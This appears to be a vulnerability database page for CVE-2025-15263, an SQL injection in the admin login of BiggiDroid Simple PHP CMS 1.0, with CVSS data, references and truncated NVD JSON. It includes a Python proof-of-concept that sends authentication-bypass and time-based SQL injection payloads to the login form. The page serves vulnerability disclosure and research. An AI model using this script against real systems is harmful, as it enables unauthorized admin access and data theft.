CVE-2025-15263

Description

A weakness has been identified in BiggiDroid Simple PHP CMS 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login. Executing a manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:biggidroid:simple_php_cms:1.0:*:*:*:*:*:*:* - VULNERABLE

BiggiDroid Simple PHP CMS 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-15263 SQL Injection PoC
# Target: BiggiDroid Simple PHP CMS 1.0
# Endpoint: /admin/login.php
# Parameter: Username

target_url = "http://target-site.com/admin/login.php"

# Basic authentication bypass using SQL injection
payloads = [
    "admin' OR '1'='1",
    "admin' -- -",
    "admin' #",
    "' OR '1'='1' -- -",
    "admin' UNION SELECT 1,2,3-- -",
]

for payload in payloads:
    data = {
        "Username": payload,
        "Password": "anypassword",
        "submit": "Login"
    }
    
    try:
        response = requests.post(target_url, data=data, timeout=10)
        # Check for successful login indicators
        if "dashboard" in response.text.lower() or "admin" in response.url:
            print(f"[+] Potential successful injection with payload: {payload}")
        else:
            print(f"[-] Payload failed: {payload}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request error: {e}")

# Blind/time-based SQL injection test
blind_payload = "admin' AND SLEEP(5)-- -"
data_blind = {
    "Username": blind_payload,
    "Password": "test",
    "submit": "Login"
}

import time
start = time.time()
response = requests.post(target_url, data=data_blind, timeout=15)
elapsed = time.time() - start

if elapsed >= 5:
    print(f"[+] Time-based blind SQL injection confirmed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15263
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15263
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15263/
[4] VulDB https://vuldb.com/cve/CVE-2025-15263
[5] https://gitee.com/devilrunsun/mywork/issues/IDGMME
[6] https://vuldb.com/?ctiid.338657
[7] https://vuldb.com/?id.338657
[8] https://vuldb.com/?submit.725820

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15263", "sourceIdentifier": "[email protected]", "published": "2025-12-30T19:15:43.993", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in BiggiDroid Simple PHP CMS 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login. Executing a manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks."}, {"lang": "es", "value": "Se ha identificado una debilidad en BiggiDroid Simple PHP CMS 1.0. Se ve afectada una función desconocida del archivo /admin/login.php del componente Admin Login. La ejecución de la manipulación del argumento Username puede llevar a una inyección SQL. El ataque puede ejecutarse de forma remota. El exploit se ha puesto a disposición del público y podría ser explotado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:biggidroid:simple_php_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8E2916D-54CD-4685-A440-3C903FF5B2C9"}]}]}], "references": [{"url": "https://gitee.com/devilrunsun/mywork/issues/IDGMME", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338657", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338657", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.725820", "source": "[email protected]", "t ... (truncated)